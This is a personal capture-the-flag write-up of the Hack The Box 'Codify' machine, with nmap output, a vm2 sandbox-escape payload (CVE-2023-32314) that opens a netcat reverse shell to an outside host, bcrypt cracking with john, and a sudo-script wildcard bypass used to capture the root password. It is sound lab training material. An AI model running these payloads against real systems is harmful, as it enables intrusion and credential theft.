HTB Codify done
Codify
Notes
svc@codify:~$ ps aux | grep root | grep doc
ps aux | grep root | grep doc
root 1241 0.0 2.0 1540564 79904 ? Ssl 10:35 0:02 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
root 1564 0.0 0.0 2888 968 ? Ss 10:35 0:00 /bin/sh /root/scripts/other/docker-startup.sh
root 1565 0.1 0.8 190444 33656 ? Sl 10:35 0:11 /usr/bin/python3 /usr/bin/docker-compose -f /root/scripts/docker/docker-compose.yml up
root 1638 0.0 0.0 1081836 2784 ? Sl 10:35 0:00 /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 3306 -container-ip 172.19.0.2 -container-port 3306
OS:
Ubuntu Jammy (22.04)
Technology:
OpenSSH 8.9p1 Ubuntu 3ubuntu0.4
Apache httpd 2.4.52
Node.js Express framework 18.15.0
vm2 javascript library
IP Address:
10.129.63.28
Open ports:
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.52
3000/tcp open http Node.js Express framework
Users and pass:
From: /var/www/contact/tickets.db
L: joshua
H: $2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2
P: spongebob1
---
After run pspy64
L: root
P: kljh12k3jhaskjh12kjh3
Nmap
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Codify]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.63.28_nmap 10.129.63.28 ; cat 10.129.63.28_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-17 11:53 CET
Nmap scan report for 10.129.63.28
Host is up (0.034s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 96:07:1c:c6:77:3e:07:a0:cc:6f:24:19:74:4d:57:0b (ECDSA)
|_ 256 0b:a4:c0:cf:e2:3b:95:ae:f6:f5:df:7d:0c:88:d6:ce (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
3000/tcp open http Node.js Express framework
|_http-title: Codify
Add IP to /etc/hosts
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Codify]
└─$ cat /etc/hosts | grep codify
10.129.63.28 codify.htb
Open website: http://codify.htb/
http://codify.htb/editor
I found editor to test node.js code
I can't make revshell with node.js i got error "Error: Module "child_process" is not allowed"
Open website: http://codify.htb:3000/about
http://codify.htb:3000/about
I find info about vm2 library javascript (vuln)
Exploit: CVE-2023-32314 - Sandbox Escape in [email protected]
[CVE-2023-32314 - Sandbox Escape in [email protected]](https://security.snyk.io/vuln/SNYK-JS-VM2-5537100)
Payload - revshell
Start netcat listener
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Codify]
└─$ netcat -lvnp 80
listening on [any] 80 ...
Run revshell
const { VM } = require("vm2");
const vm = new VM();
const code = `
const err = new Error();
err.name = {
toString: new Proxy(() => "", {
apply(target, thiz, args) {
const process = args.constructor.constructor("return process")();
throw process.mainModule.require("child_process").execSync("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|netcat 10.10.14.57 80 >/tmp/f").toString();
},
}),
};
try {
err.stack;
} catch (stdout) {
stdout;
}
`;
console.log(vm.run(code)); // -> hacked
Upgrade to fully interactive shell
$ script -qc /bin/bash /dev/null
svc@codify:~$
svc@codify:~$ id
id
uid=1001(svc) gid=1001(svc) groups=1001(svc)
svc@codify:~$
Database: tickets.db
Find databases
svc@codify:~$ find / -name "*.db" 2>/dev/null
find / -name "*.db" 2>/dev/null
/var/www/contact/tickets.db
/var/lib/plocate/plocate.db
/var/lib/fwupd/pending.db
/var/lib/PackageKit/transactions.db
/var/lib/command-not-found/commands.db
/usr/lib/firmware/regulatory.db
svc@codify:~$
Get user hash
svc@codify:~$ ^[[200~sqlite3 /var/www/contact/tickets.db^[[201~
sqlite3 /var/wsqlite3 /var/www/contact/tickets.db
SQLite version 3.37.2 2022-01-06 13:25:41
Enter ".help" for usage hints.
sqlite> .databases
.databases
main: /var/www/contact/tickets.db r/w
sqlite> .tables
.tables
tickets users
sqlite> SQL * FROM users;
SQL * FROM users;
Error: in prepare, near "SQL": syntax error (1)
sqlite> SELECT * FROM users;
SELECT * FROM users;
3|joshua|$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2
sqlite>
Cracking hash
L: joshua
P: spongebob1
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Codify]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt joshua.hash
Created directory: /home/kali/.john
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 4096 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
spongebob1 (?)
1g 0:00:01:12 DONE (2025-01-17 14:46) 0.01375g/s 18.56p/s 18.56c/s 18.56C/s crazy1..eunice
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Read flag: user.txt
L: joshua
P: spongebob1
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Codify]
└─$ ssh [email protected]
The authenticity of host '10.129.63.28 (10.129.63.28)' can't be established.
ED25519 key fingerprint is SHA256:Q8HdGZ3q/X62r8EukPF0ARSaCd+8gEhEJ10xotOsBBE.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.63.28' (ED25519) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-88-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Jan 17 02:00:12 PM UTC 2025
System load: 0.09765625
Usage of /: 64.2% of 6.50GB
Memory usage: 29%
Swap usage: 0%
Processes: 254
Users logged in: 0
IPv4 address for br-030a38808dbf: 172.18.0.1
IPv4 address for br-5ab86a4e40d0: 172.19.0.1
IPv4 address for docker0: 172.17.0.1
IPv4 address for eth0: 10.129.63.28
IPv6 address for eth0: dead:beef::250:56ff:fe94:add9
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Wed Mar 27 13:01:24 2024 from 10.10.14.23
joshua@codify:~$ pwd
/home/joshua
joshua@codify:~$ ls
user.txt
joshua@codify:~$ cat user.txt ; ip a ; id
d64ea5371807ac61c826ca8ee37c8832
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:94:ad:d9 brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.129.63.28/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 2512sec preferred_lft 2512sec
inet6 dead:beef::250:56ff:fe94:add9/64 scope global dynamic mngtmpaddr
valid_lft 86392sec preferred_lft 14392sec
inet6 fe80::250:56ff:fe94:add9/64 scope link
valid_lft forever preferred_lft forever
3: br-030a38808dbf: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:e8:93:49:f4 brd ff:ff:ff:ff:ff:ff
inet 172.18.0.1/16 brd 172.18.255.255 scope global br-030a38808dbf
valid_lft forever preferred_lft forever
4: br-5ab86a4e40d0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:39:ac:86:54 brd ff:ff:ff:ff:ff:ff
inet 172.19.0.1/16 brd 172.19.255.255 scope global br-5ab86a4e40d0
valid_lft forever preferred_lft forever
inet6 fe80::42:39ff:feac:8654/64 scope link
valid_lft forever preferred_lft forever
5: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:2a:a6:2d:a8 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
7: veth1fefef1@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-5ab86a4e40d0 state UP group default
link/ether 12:12:8d:d5:80:83 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::1012:8dff:fed5:8083/64 scope link
valid_lft forever preferred_lft forever
uid=1000(joshua) gid=1000(joshua) groups=1000(joshua)
joshua@codify:~$
Privilege Escalation
sudo -l
problem with missing quotation marks in the if function
if [[ $DB_PASS == $USER_PASS ]]; then
---
joshua@codify:~$ sudo -l
[sudo] password for joshua:
Matching Defaults entries for joshua on codify:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User joshua may run the following commands on codify:
(root) /opt/scripts/mysql-backup.sh
joshua@codify:~$
joshua@codify:~$ ls -la /opt/scripts/mysql-backup.sh
-rwxr-xr-x 1 root root 928 Nov 2 2023 /opt/scripts/mysql-backup.sh
joshua@codify:~$
joshua@codify:~$ cat /opt/scripts/mysql-backup.sh
#!/bin/bash
DB_USER="root"
DB_PASS=$(/usr/bin/cat /root/.creds)
BACKUP_DIR="/var/backups/mysql"
read -s -p "Enter MySQL password for $DB_USER: " USER_PASS
/usr/bin/echo
if [[ $DB_PASS == $USER_PASS ]]; then
/usr/bin/echo "Password confirmed!"
else
/usr/bin/echo "Password confirmation failed!"
exit 1
fi
/usr/bin/mkdir -p "$BACKUP_DIR"
databases=$(/usr/bin/mysql -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" -e "SHOW DATABASES;" | /usr/bin/grep -Ev "(Database|information_schema|performance_schema)")
for db in $databases; do
/usr/bin/echo "Backing up database: $db"
/usr/bin/mysqldump --force -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" "$db" | /usr/bin/gzip > "$BACKUP_DIR/$db.sql.gz"
done
/usr/bin/echo "All databases backed up successfully!"
/usr/bin/echo "Changing the permissions"
/usr/bin/chown root:sys-adm "$BACKUP_DIR"
/usr/bin/chmod 774 -R "$BACKUP_DIR"
/usr/bin/echo 'Done!'
joshua@codify:~$
pspy64
https://github.com/DominicBreuker/pspy?tab=readme-ov-file
Get password for user: root
Put password as star: "*"
___
joshua@codify:~$ sudo /opt/scripts/mysql-backup.sh
Enter MySQL password for root:
Password confirmed!
mysql: [Warning] Using a password on the command line interface can be insecure.
Backing up database: mysql
mysqldump: [Warning] Using a password on the command line interface can be insecure.
-- Warning: column statistics not supported by the server.
mysqldump: Got error: 1556: You can't use locks with log tables when using LOCK TABLES
mysqldump: Got error: 1556: You can't use locks with log tables when using LOCK TABLES
Backing up database: sys
mysqldump: [Warning] Using a password on the command line interface can be insecure.
-- Warning: column statistics not supported by the server.
All databases backed up successfully!
Changing the permissions
Done!
joshua@codify:~$
---
1/20 11:19:42 CMD: UID=0 PID=3005 | /bin/bash /opt/scripts/mysql-backup.sh
2025/01/20 11:19:42 CMD: UID=0 PID=3006 | /bin/bash /opt/scripts/mysql-backup.sh
2025/01/20 11:19:42 CMD: UID=0 PID=3007 | /bin/bash /opt/scripts/mysql-backup.sh
2025/01/20 11:19:42 CMD: UID=0 PID=3008 | /bin/bash /opt/scripts/mysql-backup.sh
2025/01/20 11:19:42 CMD: UID=0 PID=3010 |
2025/01/20 11:19:42 CMD: UID=0 PID=3009 |
2025/01/20 11:19:42 CMD: UID=0 PID=3011 | /usr/bin/echo Backing up database: mysql
2025/01/20 11:19:42 CMD: UID=0 PID=3013 | /bin/bash /opt/scripts/mysql-backup.sh
2025/01/20 11:19:42 CMD: UID=0 PID=3012 | /usr/bin/mysqldump --force -u root -h 0.0.0.0 -P 3306 -pkljh12k3jhaskjh12kjh3 mysql
Read flag: root.txt
L: root
P: kljh12k3jhaskjh12kjh3
---
joshua@codify:~$ su root
Password:
root@codify:/home/joshua# cd ~
root@codify:~#
root@codify:~# ls -a
. .. .bash_history .bashrc .creds .local .mysql_history .profile root.txt scripts .ssh .vimrc
root@codify:~#
root@codify:~# cat root.txt ; ip a ; whoami
87933486cd876cfb49ca5db1351f6c10
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:94:b3:0b brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.129.61.78/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 3567sec preferred_lft 3567sec
inet6 dead:beef::250:56ff:fe94:b30b/64 scope global dynamic mngtmpaddr
valid_lft 86395sec preferred_lft 14395sec
inet6 fe80::250:56ff:fe94:b30b/64 scope link
valid_lft forever preferred_lft forever
3: br-5ab86a4e40d0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:e5:2c:a6:62 brd ff:ff:ff:ff:ff:ff
inet 172.19.0.1/16 brd 172.19.255.255 scope global br-5ab86a4e40d0
valid_lft forever preferred_lft forever
inet6 fe80::42:e5ff:fe2c:a662/64 scope link
valid_lft forever preferred_lft forever
4: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:eb:da:f5:22 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
5: br-030a38808dbf: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:00:12:0e:40 brd ff:ff:ff:ff:ff:ff
inet 172.18.0.1/16 brd 172.18.255.255 scope global br-030a38808dbf
valid_lft forever preferred_lft forever
7: veth43c5f77@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-5ab86a4e40d0 state UP group default
link/ether d2:15:30:4f:89:9b brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::d015:30ff:fe4f:899b/64 scope link
valid_lft forever preferred_lft forever
root
root@codify:~#
References
[CVE-2023-32314 - Sandbox Escape in [email protected]](https://security.snyk.io/vuln/SNYK-JS-VM2-5537100)
Lessons Learned